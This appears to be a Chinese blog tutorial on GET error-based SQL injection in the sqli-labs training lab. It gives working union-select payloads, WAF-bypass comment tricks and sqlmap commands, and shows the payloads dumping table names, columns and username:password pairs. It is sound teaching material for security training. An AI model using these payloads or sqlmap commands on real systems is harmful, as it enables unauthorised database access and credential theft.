GET基于报错的SQL注入

在这里插入图片描述

当前用户:select user();
所有数据库:show databases;
当前数据库:select database();
当前版本:select version();

mysql常用注释符:#或–空格或/**/ 空格也就是%20
内联注释:/!SQL语句/只有MySQL可以识别,常用来绕过WAF

select * from articles where id=id

使用内联注释注入:

select * from articles where id=-1 /*!union*//*!select*/ 1,2,3,4

根据注入位置数据类型可将SQL注入分为两类:数字型和字符型

GET基于报错的SQL注入:实验靶场:sqli-labs less1~4在这里插入图片描述提示:报错默认加了单引号,去掉单引号,才是真正SQL语句的报错

less1:

输入:?id=14'
报错:''14'' LIMIT 0,1'
猜测:select login_name,password from admin where id = 'id' limit 0,1
解决:?id=14' --+

less2:

输入:?id=14'
报错:  '' LIMIT 0,1'
猜测:select login_name,password from admin where id = id limit 0,1
解决:/?id=14  --+'

less3:

输入:?id=14'
报错: ''14'') LIMIT 0,1'
猜测:select login_name,password from admin where id = ('id') limit 0,1
解决:?id=14') --+

less4:

输入:?id=14“
报错:'"14"") LIMIT 0,1'
猜测:select login_name,password from admin where id = ("id") limit 0,1
解决:?id=14") --+

GET基于报错的SQL注入利用:

  1. 利用order by 判断字段数
  2. 利用union select 联合查询,获取表名
?id=0’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
  1. 利用union select 联合查询,获取字段名
?id=0’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
  1. 利用union select 联合查询,获取字段值
?id=0' union select 1,group_concat(username,password),3 from users --+

例子less 1 详解:

输入:?id=1' order by 3 --+
输出:正常
再输入 :?id=1' order by 4 --+
输出:报错 
由此推断为3列
再输入:?id=0' union select 1,user(),database()  --+
输出:Your Login name:root@localhost
     Your Password:security
由此得到当前mysql用户和当前数据库名,也可version()得到数据库版本
再输入:?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
输出:Your Login name:emails,referers,uagents,users
     Your Password:3
由此得到所有的表名
再输入:?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
输出:Your Login name:user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,user,pass,ip,login_time,status,ppp,id,username,password,sex,work,phone,id,username,password,id,user,pass,ip,login_time,status,ppp 
     Your Password:3
由此得到users表的所有字段名
再输入:?id=0' union select 1,group_concat(username,0x3a,password),3 from users --+
输出:Your Login name:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
     Your Password:3
由此得到users表中username和password字段的所有值

sqlmap安全测试:–batch:表示默认操作

爆数据库:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs --batch
爆表名:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security --tables --batch
爆字段:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns --batch
爆字段值:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C username,password --dump --batch

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Luckysec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值